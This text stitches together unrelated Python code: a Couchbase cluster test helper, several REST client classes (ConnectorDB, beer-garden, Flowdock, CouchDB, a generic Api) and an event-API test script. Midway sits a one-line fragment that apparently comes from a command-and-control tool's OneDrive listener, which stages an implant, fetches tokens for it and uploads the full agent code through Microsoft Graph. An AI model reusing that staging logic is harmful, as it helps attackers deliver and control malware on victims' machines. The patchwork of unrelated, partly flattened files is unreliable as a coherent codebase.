                log_info("Key not found error: Bucket is ready!")
                break

        self.wait_for_ready_state()
        return name

    def delete_couchbase_server_cached_rev_bodies(self, bucket):
        """
        Deletes docs that follow the below format
        _sync:rev:att_doc:34:1-e7fa9a5e6bb25f7a40f36297247ca93e
        """
        b = Bucket("couchbase://{}/{}".format(self.host, bucket))
        cached_rev_doc_ids = []
        # A primary index is required before the bucket can be queried via N1QL.
        b.n1ql_query("CREATE PRIMARY INDEX ON `{}`".format(bucket)).execute()
        for row in b.n1ql_query("SELECT meta(`{}`) FROM `{}`".format(bucket, bucket)):
            if row["$1"]["id"].startswith("_sync:rev"):
                cached_rev_doc_ids.append(row["$1"]["id"])
        log_info("Found temp rev docs: {}".format(cached_rev_doc_ids))
        for doc_id in cached_rev_doc_ids:
            log_debug("Removing: {}".format(doc_id))
            b.remove(doc_id)

    def get_server_docs_with_prefix(self, bucket, prefix):
        """
        Returns server doc ids matching a prefix (ex. '_sync:rev:')
        """
        b = Bucket("couchbase://{}/{}".format(self.host, bucket))
        found_ids = []
        # A primary index is required before the bucket can be queried via N1QL.
        b.n1ql_query("CREATE PRIMARY INDEX ON `{}`".format(bucket)).execute()
        for row in b.n1ql_query("SELECT meta(`{}`) FROM `{}`".format(bucket, bucket)):
            log_info(row)
            if row["$1"]["id"].startswith(prefix):
                found_ids.append(row["$1"]["id"])
        return found_ids

    def _get_tasks(self):
        """ Returns the current tasks from the server """
        resp = self._session.get("{}/pools/default/tasks".format(self.url))
        log_r(resp)
        resp.raise_for_status()
        resp_obj = resp.json()
        return resp_obj

    def _wait_for_rebalance_complete(self):
        """ Polls couchbase server tasks endpoint for any running rebalances.
        Exits when no rebalances are in running state

        /pools/default/tasks format:
        [
            {
                "type": "rebalance",
                "status": "running",
                ...
            }
        ]
        """
        # Check that rebalance is in the tasks before polling for its completion
        start = time.time()
        found_rebalance = False
        while not found_rebalance:
            if time.time() - start > keywords.constants.CLIENT_REQUEST_TIMEOUT:
                raise TimeoutError("Did not find rebalance task!")
            tasks = self._get_tasks()
            for task in tasks:
                if task["type"] == "rebalance":
                    log_info("Rebalance found in tasks!")
                    found_rebalance = True
            if not found_rebalance:
                log_info("Did not find rebalance task. Retrying.")
                time.sleep(1)

        # Phase 2: poll until no rebalance task is in "running" state.
        start = time.time()
        while True:
            if time.time() - start > keywords.constants.REBALANCE_TIMEOUT_SECS:
                raise Exception("wait_for_rebalance_complete: TIMEOUT")
            tasks = self._get_tasks()
            done_rebalacing = True
            for task in tasks:
                # loop through each task and see if any rebalance tasks are running
                task_type = task["type"]
                task_status = task["status"]
                log_info("{} is {}".format(task_type, task_status))
                if task_type == "rebalance" and task_status == "running":
                    done_rebalacing = False
            if done_rebalacing:
                break
            time.sleep(1)

    def add_node(self, server_to_add):
        """ Add the server_to_add to a Couchbase Server cluster """
        if not isinstance(server_to_add, CouchbaseServer):
            raise TypeError("'server_to_add' must be a 'CouchbaseServer'")

        log_info("Adding server node {} to cluster ...".format(server_to_add))
        data = "hostname={}&user=Administrator&password=password&services=kv".format(
            server_to_add.host
        )

        # HACK: Retry below addresses the following problem:
        # 1. Rebalance a node out
        # 2. Try to to immediately add node back into the cluster
        # 3. Fails because node is in state where it can't be add in yet
        # To work around this:
        # 1. Retry / wait until add node POST command is successful
        start = time.time()
        while True:
            if time.time() - start > keywords.constants.CLIENT_REQUEST_TIMEOUT:
                raise Exception("wait_for_rebalance_complete: TIMEOUT")
            # Override session headers for this one off request
            resp = self._session.post(
                "{}/controller/addNode".format(self.url),
                headers={"Content-Type": "application/x-www-form-urlencoded"},
                data=data
            )
            log_r(resp)
            # If status of the POST is not 200, retry the request after a second
            if resp.status_code == 200:
                log_info("{} added to cluster successfully".format(server_to_add))
                break
            else:
                log_info("{}: Could not add {} to cluster. Retrying ...".format(resp.status_code, server_to_add))
                time.sleep(1)

    def rebalance_out(self, cluster_servers, server_to_remove):
        """ Issues a call to the admin_serve to remove a server from a pool.
        Then wait for rebalance to complete.
        """
        if not isinstance(server_to_remove, CouchbaseServer):
            raise TypeError("'server_to_remove' must be a 'CouchbaseServer'")

        # Build knownNodes from every cluster server (scheme/port stripped).
        known_nodes = "knownNodes="
        for server in cluster_servers:
            server = server.replace("http://", "")
            server = server.replace(":8091", "")
            known_nodes += "ns_1@{},".format(server)

        # Mark server_to_remove as the node to eject.
        ejected_node = "ejectedNodes=ns_1@{}".format(server_to_remove.host)
        data = "{}&{}".format(ejected_node, known_nodes)

        log_info("Starting rebalance out: {} with nodes {}".format(server_to_remove.host, data))

        # Override session headers for this one off request
        resp = self._session.post(
            "{}/controller/rebalance".format(self.url),
            headers={"Content-Type": "application/x-www-form-urlencoded"},
            data=data
        )
        log_r(resp)
        resp.raise_for_status()

        self._wait_for_rebalance_complete()
        return True

    def rebalance_in(self, cluster_servers, server_to_add):
        """ Adds a server from a pool and waits for rebalance to complete.
        cluster_servers should be a list of endpoints running Couchbase server.
        ex. ["http:192.168.33.10:8091", "http:192.168.33.11:8091", ...]
        """
        if not isinstance(server_to_add, CouchbaseServer):
            raise TypeError("'server_to_add' must be a 'CouchbaseServer'")

        # Add all servers except server_to_add to known nodes
        known_nodes = "knownNodes="
        for server in cluster_servers:
            server = server.replace("http://", "")
            server = server.replace(":8091", "")
            if server_to_add.host != server:
                known_nodes += "ns_1@{},".format(server)

        # Add server_to_add to known nodes
        data = "{}ns_1@{}".format(known_nodes, server_to_add.host)

        # Rebalance nodes
        log_info("Starting rebalance in for {}".format(server_to_add))
        log_info("Known nodes: {}".format(data))

        # Override session headers for this one off request
        resp = self._session.post(
            "{}/controller/rebalance".format(self.url),
            headers={"Content-Type": "application/x-www-form-urlencoded"},
            data=data
        )
        log_r(resp)
        resp.raise_for_status()

        self._wait_for_rebalance_complete()
        return True

    def recover(self, server_to_recover):
        """Set recovery type to 'delta' for a previously failed-over node."""
        if not isinstance(server_to_recover, CouchbaseServer):
            raise TypeError("'server_to_add' must be a 'CouchbaseServer'")

        log_info("Setting recover mode to 'delta' for server {}".format(server_to_recover.host))
        data = "otpNode=ns_1@{}&recoveryType=delta".format(server_to_recover.host)

        # Override session headers for this one off request
        resp = self._session.post(
            "{}/controller/setRecoveryType".format(self.url),
            headers={"Content-Type": "application/x-www-form-urlencoded"},
            data=data
        )
        log_r(resp)
        resp.raise_for_status()

    # TODO reset Quota
    def start(self):
        """Starts a running Couchbase Server via 'service couchbase-server start'"""
        command = "sudo service couchbase-server start"
        self.remote_executor.must_execute(command)
        self.wait_for_ready_state()

    def _verify_stopped(self):
        """Polls until the server url is unreachable"""
        start = time.time()
        while True:
            if time.time() - start > keywords.constants.CLIENT_REQUEST_TIMEOUT:
                raise TimeoutError("Waiting for server to be unreachable but it never was!")
            try:
                resp = self._session.get("{}/pools".format(self.url))
                log_r(resp)
                resp.raise_for_status()
            except ConnectionError:
                # This is expected and used to determine if a server node has gone offline
                break
            except HTTPError as e:
                # 500 errors may happen as a result of the node going down
                log_error(e)
                continue
            time.sleep(1)

    def stop(self):
        """Stops a running Couchbase Server via 'service couchbase-server stop'"""
        command = "sudo service couchbase-server stop"
        self.remote_executor.must_execute(command)
        self._verify_stopped()
content = s.get(item['@microsoft.graph.downloadUrl']).content lang, return_val = self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0] message = "[*] Uploading {}/{}/{}_2.txt, {} bytes".format(base_folder, staging_folder, agent_name, str(len(return_val))) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name)) s.put("%s/drive/root:/%s/%s/%s_2.txt:/content" % (base_url, base_folder, staging_folder, agent_name), data=return_val) message = "[*] Deleting {}/{}/{}".format(base_folder, staging_folder, item['name']) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name)) s.delete("%s/drive/items/%s" % (base_url, item['id'])) if stage == '3': #Download stage 3, upload stage 4 (full agent code) message = "[*] Downloading {}/{}/{}, {} bytes".format(base_folder, staging_folder, item['name'], item['size']) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name)) content = s.get(item['@microsoft.graph.downloadUrl']).content lang, return_val = self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0] session_key = self.mainMenu.agents.agents[agent_name]['sessionKey'] agent_token = renew_token(client_id, token['refresh_token']) #Get auth and refresh tokens for the agent to use agent_code = str(self.generate_agent(listener_options, client_id, agent_token['access_token'], agent_token['refresh_token'], redirect_uri, lang))
class DatabaseConnection(object):
    """Low-level connection to a ConnectorDB server.

    Owns an authenticated requests Session (basic auth: username/password or
    ""/apikey) plus a websocket handler, and exposes thin helpers for the
    CRUD and query REST endpoints.

    Fix: ``handleresult`` used a bare ``except:`` while parsing error bodies,
    which also swallowed KeyboardInterrupt/SystemExit; narrowed to
    ``except Exception:``.
    """

    def __init__(self, user_or_apikey=None, user_password=None, url="https://connectordb.com"):
        """Connect to the server and determine the logged-in device's path.

        :param user_or_apikey: username (with user_password) or an apikey (alone)
        :param user_password: password, or None to treat the first arg as an apikey
        :param url: server URL; scheme and trailing slash are added if missing
        """
        # Set up the API URL
        if not url.startswith("http"):
            url = "https://" + url
        if not url.endswith("/"):
            url = url + "/"
        self.baseurl = url
        self.url = urljoin(url, "/api/v1/")

        # Set up a session, which allows us to reuse connections
        self.r = Session()
        self.r.headers.update({'content-type': 'application/json'})

        # Prepare the websocket
        self.ws = WebsocketHandler(self.url, None)

        # Set the authentication if any
        self.setauth(user_or_apikey, user_password)

        # Now set up the login path so we know what we're logged in as
        if user_password is not None:
            self.path = user_or_apikey + "/user"
        else:
            # apikey login: ask the server who we are
            self.path = self.ping()

    def setauth(self, user_or_apikey=None, user_password=None):
        """ setauth sets the authentication header for use in the session.
        It is for use when apikey is updated or something of the sort, such that
        there is a seamless experience. """
        auth = None
        if user_or_apikey is not None:
            # ConnectorDB allows login using both basic auth or an apikey url param.
            # The python client uses basic auth for all logins
            if user_password is None:
                # Login by api key - the basic auth login uses "" user and
                # apikey as password
                user_password = user_or_apikey
                user_or_apikey = ""
            auth = HTTPBasicAuth(user_or_apikey, user_password)
            self.r.auth = auth

        # Set the websocket's authentication
        self.ws.setauth(auth)

    def close(self):
        """Closes the active connections to ConnectorDB"""
        self.r.close()

    def handleresult(self, r):
        """Handles HTTP error codes for the given request

        Raises:
            AuthenticationError on the appropriate 4** errors
            ServerError if the response is not an ok (2**)

        Arguments:
            r -- The request result
        """
        if r.status_code >= 400 and r.status_code < 500:
            msg = r.json()
            raise AuthenticationError(str(msg["code"]) + ": " + msg["msg"] + " (" + msg["ref"] + ")")
        elif r.status_code > 300:
            err = None
            try:
                msg = r.json()
                err = ServerError(str(msg["code"]) + ": " + msg["msg"] + " (" + msg["ref"] + ")")
            except Exception:
                # Body was not a valid error document; raise a generic ServerError.
                # (Narrowed from a bare except so KeyboardInterrupt/SystemExit pass through.)
                raise ServerError(
                    "Server returned error, but did not give a valid error message")
            raise err
        return r

    def ping(self):
        """Attempts to ping the server using current credentials, and responds with the path
        of the currently authenticated device"""
        return self.handleresult(self.r.get(self.url, params={"q": "this"})).text

    def query(self, query_type, query=None):
        """Run the given query on the connection (POST request to /query)"""
        return self.handleresult(self.r.post(urljoin(self.url + "query/", query_type),
                                             data=json.dumps(query))).json()

    def create(self, path, data=None):
        """Send a POST CRUD API request to the given path using the given data which will
        be converted to json"""
        return self.handleresult(self.r.post(urljoin(self.url + CRUD_PATH, path),
                                             data=json.dumps(data)))

    def read(self, path, params=None):
        """Read the result at the given path (GET) from the CRUD API, using the optional params dictionary
        as url parameters."""
        return self.handleresult(self.r.get(urljoin(self.url + CRUD_PATH, path),
                                            params=params))

    def update(self, path, data=None):
        """Send an update request to the given path of the CRUD API, with the given
        data dict, which will be converted into json"""
        return self.handleresult(self.r.put(urljoin(self.url + CRUD_PATH, path),
                                            data=json.dumps(data)))

    def delete(self, path):
        """Send a delete request to the given path of the CRUD API. This deletes the object. Or at least tries to."""
        return self.handleresult(self.r.delete(urljoin(self.url + CRUD_PATH, path)))

    def get(self, path, params=None):
        """Sends a get request to the given path in the database and with optional URL parameters"""
        return self.handleresult(self.r.get(urljoin(self.url, path), params=params))

    def subscribe(self, stream, callback, transform=""):
        """Subscribe to the given stream with the callback"""
        return self.ws.subscribe(stream, callback, transform)

    def unsubscribe(self, stream, transform=""):
        """Unsubscribe from the given stream"""
        return self.ws.unsubscribe(stream, transform)

    def wsdisconnect(self):
        """Disconnects the websocket"""
        self.ws.disconnect()
class RestClient(object):
    """Simple Rest Client for communicating to with beer-garden.

    The is the low-level client responsible for making the actual REST calls.
    Other clients (e.g. :py:class:`brewtils.rest.easy_client.EasyClient`)
    build on this by providing useful abstractions.

    :param bg_host: beer-garden REST API hostname.
    :param bg_port: beer-garden REST API port.
    :param ssl_enabled: Flag indicating whether to use HTTPS when
        communicating with beer-garden.
    :param api_version: The beer-garden REST API version. Will default to the
        latest version.
    :param logger: The logger to use. If None one will be created.
    :param ca_cert: beer-garden REST API server CA certificate.
    :param client_cert: The client certificate to use when making requests.
    :param url_prefix: beer-garden REST API Url Prefix.
    :param ca_verify: Flag indicating whether to verify server certificate
        when making a request.
    :param username: Username for Beergarden authentication
    :param password: Password for Beergarden authentication
    :param access_token: Access token for Beergarden authentication
    :param refresh_token: Refresh token for Beergarden authentication
    :param client_timeout: Max time to will wait for server response
    """

    # The Latest Version Currently released
    LATEST_VERSION = 1

    JSON_HEADERS = {'Content-type': 'application/json', 'Accept': 'text/plain'}

    def __init__(self, bg_host=None, bg_port=None, ssl_enabled=False,
                 api_version=None, logger=None, ca_cert=None,
                 client_cert=None, url_prefix=None, ca_verify=True, **kwargs):
        # 'host'/'port' kwargs are accepted as legacy aliases for bg_host/bg_port.
        bg_host = bg_host or kwargs.get('host')
        if not bg_host:
            raise ValueError('Missing keyword argument "bg_host"')
        bg_port = bg_port or kwargs.get('port')
        if not bg_port:
            raise ValueError('Missing keyword argument "bg_port"')
        self.logger = logger or logging.getLogger(__name__)

        # Configure the session to use when making requests
        self.session = Session()
        # client_timeout of -1 means "no timeout at all".
        timeout = kwargs.get('client_timeout', None)
        if timeout == -1:
            timeout = None
        # Having two is kind of strange to me, but this is what Requests does
        self.session.mount('https://', TimeoutAdapter(timeout=timeout))
        self.session.mount('http://', TimeoutAdapter(timeout=timeout))

        if not ca_verify:
            # Verification is off, so silence urllib3's InsecureRequestWarning spam.
            urllib3.disable_warnings()
            self.session.verify = False
        elif ca_cert:
            self.session.verify = ca_cert
        if client_cert:
            self.session.cert = client_cert

        self.username = kwargs.get('username', None)
        self.password = kwargs.get('password', None)
        self.access_token = kwargs.get('access_token', None)
        self.refresh_token = kwargs.get('refresh_token', None)

        # Configure the beer-garden URLs
        scheme = 'https' if ssl_enabled else 'http'
        self.base_url = (
            '%s://%s:%s%s' %
            (scheme, bg_host, bg_port, normalize_url_prefix(url_prefix)))
        self.version_url = self.base_url + 'version'
        self.config_url = self.base_url + 'config'

        api_version = api_version or self.LATEST_VERSION
        if api_version == 1:
            self.system_url = self.base_url + 'api/v1/systems/'
            self.instance_url = self.base_url + 'api/v1/instances/'
            self.command_url = self.base_url + 'api/v1/commands/'
            self.request_url = self.base_url + 'api/v1/requests/'
            self.queue_url = self.base_url + 'api/v1/queues/'
            self.logging_config_url = self.base_url + 'api/v1/config/logging/'
            self.job_url = self.base_url + 'api/v1/jobs/'
            self.token_url = self.base_url + 'api/v1/tokens/'
            self.user_url = self.base_url + 'api/v1/users/'
            # NOTE(review): events deliberately use the 'vbeta' endpoint --
            # presumably the events API is still beta; confirm before "fixing".
            self.event_url = self.base_url + 'api/vbeta/events/'
        else:
            raise ValueError("Invalid beer-garden API version: %s" %
                             api_version)

    @enable_auth
    def get_version(self, **kwargs):
        """Perform a GET to the version URL

        :param kwargs: Parameters to be used in the GET request
        :return: The request response
        """
        return self.session.get(self.version_url, params=kwargs)

    @enable_auth
    def get_config(self, **kwargs):
        """Perform a GET to the config URL

        :param kwargs: Passed to underlying Requests method
        :return: The request response
        """
        # NOTE(review): unlike get_version, kwargs here go straight to
        # Session.get rather than as query params -- intentional asymmetry?
        return self.session.get(self.config_url, **kwargs)

    @enable_auth
    def get_logging_config(self, **kwargs):
        """Perform a GET to the logging config URL

        :param kwargs: Parameters to be used in the GET request
        :return: The request response
        """
        return self.session.get(self.logging_config_url, params=kwargs)

    @enable_auth
    def get_systems(self, **kwargs):
        """Perform a GET on the System collection URL

        :param kwargs: Parameters to be used in the GET request
        :return: The request response
        """
        return self.session.get(self.system_url, params=kwargs)

    @enable_auth
    def get_system(self, system_id, **kwargs):
        """Performs a GET on the System URL

        :param system_id: ID of system
        :param kwargs: Parameters to be used in the GET request
        :return: Response to the request
        """
        return self.session.get(self.system_url + system_id, params=kwargs)

    @enable_auth
    def post_systems(self, payload):
        """Performs a POST on the System URL

        :param payload: New request definition
        :return: Response to the request
        """
        return self.session.post(self.system_url, data=payload,
                                 headers=self.JSON_HEADERS)

    @enable_auth
    def patch_system(self, system_id, payload):
        """Performs a PATCH on a System URL

        :param system_id: ID of system
        :param payload: The update specification
        :return: Response
        """
        return self.session.patch(self.system_url + str(system_id),
                                  data=payload, headers=self.JSON_HEADERS)

    @enable_auth
    def delete_system(self, system_id):
        """Performs a DELETE on a System URL

        :param system_id: The ID of the system to remove
        :return: Response to the request
        """
        return self.session.delete(self.system_url + system_id)

    @enable_auth
    def get_instance(self, instance_id):
        """Performs a GET on the Instance URL

        :param instance_id: ID of instance
        :return: Response to the request
        """
        return self.session.get(self.instance_url + instance_id)

    @enable_auth
    def patch_instance(self, instance_id, payload):
        """Performs a PATCH on the instance URL

        :param instance_id: ID of instance
        :param payload: The update specification
        :return: Response
        """
        return self.session.patch(self.instance_url + str(instance_id),
                                  data=payload, headers=self.JSON_HEADERS)

    @enable_auth
    def delete_instance(self, instance_id):
        """Performs a DELETE on an Instance URL

        :param instance_id: The ID of the instance to remove
        :return: Response to the request
        """
        return self.session.delete(self.instance_url + instance_id)

    @enable_auth
    def get_commands(self):
        """Performs a GET on the Commands URL"""
        return self.session.get(self.command_url)

    @enable_auth
    def get_command(self, command_id):
        """Performs a GET on the Command URL

        :param command_id: ID of command
        :return: Response to the request
        """
        return self.session.get(self.command_url + command_id)

    @enable_auth
    def get_requests(self, **kwargs):
        """Performs a GET on the Requests URL

        :param kwargs: Parameters to be used in the GET request
        :return: Response to the request
        """
        return self.session.get(self.request_url, params=kwargs)

    @enable_auth
    def get_request(self, request_id):
        """Performs a GET on the Request URL

        :param request_id: ID of request
        :return: Response to the request
        """
        return self.session.get(self.request_url + request_id)

    @enable_auth
    def post_requests(self, payload, **kwargs):
        """Performs a POST on the Request URL

        Args:
            payload: New request definition
            kwargs: Extra request parameters

        Keyword Args:
            blocking: Wait for request to complete
            timeout: Maximum seconds to wait

        Returns:
            Response to the request
        """
        return self.session.post(self.request_url, data=payload,
                                 headers=self.JSON_HEADERS, params=kwargs)

    @enable_auth
    def patch_request(self, request_id, payload):
        """Performs a PATCH on the Request URL

        :param request_id: ID of request
        :param payload: New request definition
        :return: Response to the request
        """
        return self.session.patch(self.request_url + str(request_id),
                                  data=payload, headers=self.JSON_HEADERS)

    @enable_auth
    def post_event(self, payload, publishers=None):
        """Performs a POST on the event URL

        :param payload: New event definition
        :param publishers: Array of publishers to use
        :return: Response to the request
        """
        return self.session.post(
            self.event_url, data=payload, headers=self.JSON_HEADERS,
            params={'publisher': publishers} if publishers else None)

    @enable_auth
    def get_queues(self):
        """Performs a GET on the Queues URL

        :return: Response to the request
        """
        return self.session.get(self.queue_url)

    @enable_auth
    def delete_queues(self):
        """Performs a DELETE on the Queues URL

        :return: Response to the request
        """
        return self.session.delete(self.queue_url)

    @enable_auth
    def delete_queue(self, queue_name):
        """Performs a DELETE on a specific Queue URL

        :return: Response to the request
        """
        return self.session.delete(self.queue_url + queue_name)

    @enable_auth
    def get_jobs(self, **kwargs):
        """Performs a GET on the Jobs URL.

        Returns:
            Response to the request
        """
        return self.session.get(self.job_url, params=kwargs)

    @enable_auth
    def get_job(self, job_id):
        """Performs a GET on the Job URL

        :param job_id: ID of job
        :return: Response to the request
        """
        return self.session.get(self.job_url + job_id)

    @enable_auth
    def post_jobs(self, payload):
        """Performs a POST on the Job URL

        :param payload: New job definition
        :return: Response to the request
        """
        return self.session.post(self.job_url, data=payload,
                                 headers=self.JSON_HEADERS)

    @enable_auth
    def patch_job(self, job_id, payload):
        """Performs a PATCH on the Job URL

        :param job_id: ID of request
        :param payload: New job definition
        :return: Response to the request
        """
        return self.session.patch(self.job_url + str(job_id), data=payload,
                                  headers=self.JSON_HEADERS)

    @enable_auth
    def delete_job(self, job_id):
        """Performs a DELETE on a Job URL

        :param job_id: The ID of the job to remove
        :return: Response to the request
        """
        return self.session.delete(self.job_url + job_id)

    @enable_auth
    def get_user(self, user_identifier):
        """Performs a GET on the specific User URL

        :return: Response to the request
        :param user_identifier: ID or username of User
        """
        return self.session.get(self.user_url + user_identifier)

    # No @enable_auth on the two token methods below -- they are the
    # calls that acquire the credentials the decorator would need.
    def get_tokens(self, username=None, password=None):
        """Use a username and password to get access and refresh tokens

        Args:
            username: Beergarden username
            password: Beergarden password

        Returns:
            Response object
        """
        response = self.session.post(self.token_url,
                                     headers=self.JSON_HEADERS,
                                     data=json.dumps({
                                         'username': username or self.username,
                                         'password': password or self.password
                                     }))
        if response.ok:
            # Cache the tokens and attach the bearer token to every
            # subsequent request made through this session.
            response_data = response.json()
            self.access_token = response_data['token']
            self.refresh_token = response_data['refresh']
            self.session.headers[
                'Authorization'] = 'Bearer ' + self.access_token
        return response

    def refresh(self, refresh_token=None):
        """Use a refresh token to obtain a new access token

        Args:
            refresh_token: Refresh token to use

        Returns:
            Response object
        """
        refresh_token = refresh_token or self.refresh_token
        response = self.session.get(self.token_url + refresh_token)
        if response.ok:
            response_data = response.json()
            self.access_token = response_data['token']
            self.session.headers[
                'Authorization'] = 'Bearer ' + self.access_token
        return response
class Api:
    """An API with url `base_url`.

    If `token_provider` is specified, all requests will be authenticated
    with the access token it provides.
    """

    # BUG FIX: the original signature used ``retry: ... = ApiRetry()``, a
    # call in a default argument (flake8-bugbear B008): one ApiRetry
    # instance was created at import time and shared by every Api ever
    # constructed. This sentinel lets us build a fresh ApiRetry per
    # instance while still treating an explicit ``retry=None`` as
    # "disable retries", exactly as before.
    _DEFAULT_RETRY = object()

    def __init__(
        self,
        base_url: str,
        token_provider: Optional[TokenProvider] = None,
        retry: Optional[ApiRetry] = _DEFAULT_RETRY,
    ) -> None:
        """Create the API client.

        :param base_url: Base URL; a trailing "/" is appended if missing.
        :param token_provider: If given, requests carry its bearer token.
        :param retry: Retry policy. Omit for a default ApiRetry; pass
            None to disable the retry adapter entirely.
        """
        if retry is Api._DEFAULT_RETRY:
            retry = ApiRetry()

        # Normalize so _url() can always just concatenate.
        self.base_url = base_url if base_url.endswith("/") else f"{base_url}/"

        # Initialize session
        self.session = Session()
        self.session.auth = BearerTokenAuth(token_provider) if token_provider else None
        self.session.headers.update({"Cache-Control": "no-cache"})
        self.session.hooks = {"response": self._log_response}  # type: ignore

        # Attach retry adapter (skipped when retry was explicitly None)
        if retry:
            adapter = HTTPAdapter(max_retries=retry)
            self.session.mount("http://", adapter)
            self.session.mount("https://", adapter)

    def _url(self, uri: str) -> str:
        """Join *uri* onto the slash-terminated base url."""
        return f"{self.base_url}{uri}"

    def _log_response(self, response: Response, *args, **kwargs) -> None:
        """Response hook: debug-log every call with its elapsed time."""
        t = response.elapsed.total_seconds()
        logger.debug(
            f"Called {response.request.method} {response.url} with body"  # type: ignore
            f" {response.request.body} ({t} s)"
        )

    def _process_response(self, response: Response) -> Dict:
        """Raise for HTTP errors (logging the server's message); else return json.

        :raises HTTPError: re-raised after logging when the status is an error.
        """
        try:
            # Raise any error
            response.raise_for_status()
        except HTTPError:
            # Catch the error, to log the response's message, and reraise
            # Try to decode the response as json, else fall back to raw text
            response_json = self._get_json(response)
            msg = (
                response_json.get("message")
                if isinstance(response_json, dict)
                else response_json or response.text
            )
            logger.debug(f"HTTP Error: {response.reason} - {msg}")
            raise
        # Return json, if any
        return self._get_json(response)

    def _get_json(self, response: Response) -> Dict:
        """Decode the body as json, or return {} when it is not valid json."""
        try:
            return response.json()
        except ValueError:
            return {}

    def get(self, uri: str, params: Optional[Dict] = None, **kwargs) -> Dict:
        """Sends a GET request"""
        response = self.session.get(url=self._url(uri), params=params, **kwargs)
        return self._process_response(response)

    def raw_post(
        self, uri: str, data: Optional[Dict] = None, json: Optional[Dict] = None, **kwargs
    ) -> requests.Response:
        """Sends a POST request without processing response"""
        return self.session.post(url=self._url(uri), data=data, json=json, **kwargs)

    def post(
        self, uri: str, data: Optional[Dict] = None, json: Optional[Dict] = None, **kwargs
    ) -> Dict:
        """Sends a POST request"""
        response = self.session.post(url=self._url(uri), data=data, json=json, **kwargs)
        return self._process_response(response)

    def put(
        self, uri: str, data: Optional[Dict] = None, json: Optional[Dict] = None, **kwargs
    ) -> Dict:
        """Sends a PUT request"""
        response = self.session.put(url=self._url(uri), data=data, json=json, **kwargs)
        return self._process_response(response)

    def delete(self, uri: str, **kwargs) -> Dict:
        """Sends a DELETE request"""
        response = self.session.delete(url=self._url(uri), **kwargs)
        return self._process_response(response)
class Flowdock(object):
    """Thin convenience wrapper around the Flowdock REST API."""

    API_URL = "https://api.flowdock.com"

    def __init__(self, api_key, debug=False, print_function=None):
        """Set up the authenticated API session.

        debug -- when True, emit debug messages
        print_function -- callable used to emit debug output; defaults to
            the builtin print. Mainly for passing click.echo without
            requiring click as a dependency.
        """
        self.session = Session()
        # requests takes HTTP basic auth as a (user, pass) tuple; Flowdock
        # authenticates with the api key as the username and no password.
        self.session.auth = (api_key, None)
        self.print_debug = debug
        self.print = print_function or print

    def debug(self, message):
        """Emit *message* through the configured printer when debugging."""
        if self.print_debug:
            self.print(message)

    def list_organizations(self):
        """List the organizations this user has access to."""
        url = "{}/organizations".format(self.API_URL)
        self.debug("Sending GET request to URL {}".format(url))
        response = self.session.get(url)
        response.raise_for_status()
        return response.json()

    def find_user_orgs(self, email):
        """Find the organizations the given user belongs to."""
        return [
            org for org in self.list_organizations()
            if Flowdock.user_in_org(email, org)
        ]

    @staticmethod
    def user_in_org(email, org):
        """Check whether *email* belongs to a member of *org*."""
        return any(member['email'] == email for member in org['users'])

    def delete_user_from_org(self, user, org):
        """Delete given user from given organization."""
        url = "{}/organizations/{}/users/{}".format(
            self.API_URL, org['parameterized_name'], user['id'])
        self.debug("Sending DELETE request to url {}".format(url))
        response = self.session.delete(url)
        response.raise_for_status()

    def find_inactive_in_org(self, org, days=90, null=False):
        """Find inactive users in a Flowdock organization.

        Flowdock exposes an unofficial endpoint,
        /organizations/:organization/audits/users/, listing when each user
        was last active in the organization. Undocumented, but it seems to
        work fairly well.

        Arguments:
            org -- parameterized flowdock organization name to check

        Keyword arguments:
            days -- how many days since last activity counts as inactive
            null -- instead return users whose last activity date is
                unknown for some reason
        """
        url = "{}/organizations/{}/audits/users/".format(self.API_URL, org)
        self.debug("Sending GET request to URL {}".format(url))
        response = self.session.get(url)
        response.raise_for_status()
        members = response.json()
        if null:
            return [m for m in members if m['accessed_at'] is None]
        cutoff = datetime.now() - timedelta(days=days)
        return [
            m for m in members
            if m['accessed_at'] is not None and _last_access_before(m, cutoff)
        ]

    def close(self):
        """Close the http session used internally.

        Call when the API object is no longer needed, to free resources on
        both client and server.
        """
        self.session.close()
# NOTE(review): this chunk starts mid-expression -- the `}).json())` below
# closes a call whose opening lines are outside this view.
}).json())
# Show the newest invite as seen by session 3.
print(s_3.get(api_adr + 'invites').json()['invites'][-1])
# Fetch the event as session 2, tweak description/timezone, and post the edit.
event_j = s_2.get(
    api_adr + 'event/{}'.format(event_json['event_id'])).json()['event']
event_j['event_description'] = 'This is new desc'
event_j['event_timezone'] = None
print(
    'EDIT EVENT',
    s_2.post(api_adr + 'event/{}'.format(event_json['event_id']),
             json=event_j).json())
print(s_3.get(api_adr + 'invites').json()['invites'][-1])
# Mark attendance on the invite, then re-check the invite list.
print(
    s_3.post(api_adr + 'invite/{}/attendance'.format(invite['invite_id']),
             json={
                 'attendance': 1
             }).json())
print(s_3.get(api_adr + 'invites').json()['invites'][-1])
# Restore the invite and re-check.
print(
    s_3.post(api_adr +
             'invite/{}/restore'.format(invite['invite_id'])).json())
print(s_3.get(api_adr + 'invites').json()['invites'][-1])
# Delete the event as session 1 (presumably the owner) and list the calendar.
print(
    'DELETE EVENT',
    s_1.delete(api_adr + 'event/{}'.format(event_json['event_id'])).json())
print('GET EVENTS', s_1.get(api_adr + 'calendar/{}'.format(c_1)).json())
class Server(object):
    """Thin client for a CouchDB server built on a requests Session."""

    def __init__(self, host="http://localhost:5984", auth=None, trust_env=False):
        self.host = host
        self.session = Session()
        # trust env make use of get_netrc that is soooo slow
        self.session.trust_env = trust_env
        self.session.auth = auth
        self.session.headers = {
            "Content-Type": "application/json",
        }

    def __getitem__(self, name):
        """Return a Database handle without creating it on the server."""
        return Database(name, server=self, create=False)

    def __len__(self):
        """Number of databases on the server (issues an _all_dbs request)."""
        return len(self.get_databases())

    def __nonzero__(self):
        """ Returns if server is available """
        try:
            self.session.head(self.host)
            return True
        except Exception:
            # Was a bare `except:` -- narrowed so an availability probe
            # cannot swallow KeyboardInterrupt/SystemExit.
            return False

    # BUG FIX: Python 3 ignores __nonzero__, and with __len__ defined above
    # bool(server) silently performed a full _all_dbs request instead of the
    # cheap HEAD availability probe. Alias restores the intended behavior.
    __bool__ = __nonzero__

    def __delitem__(self, name):
        self.delete_db(name)

    def __contains__(self, db_or_name):
        """ Tests if the database exists """
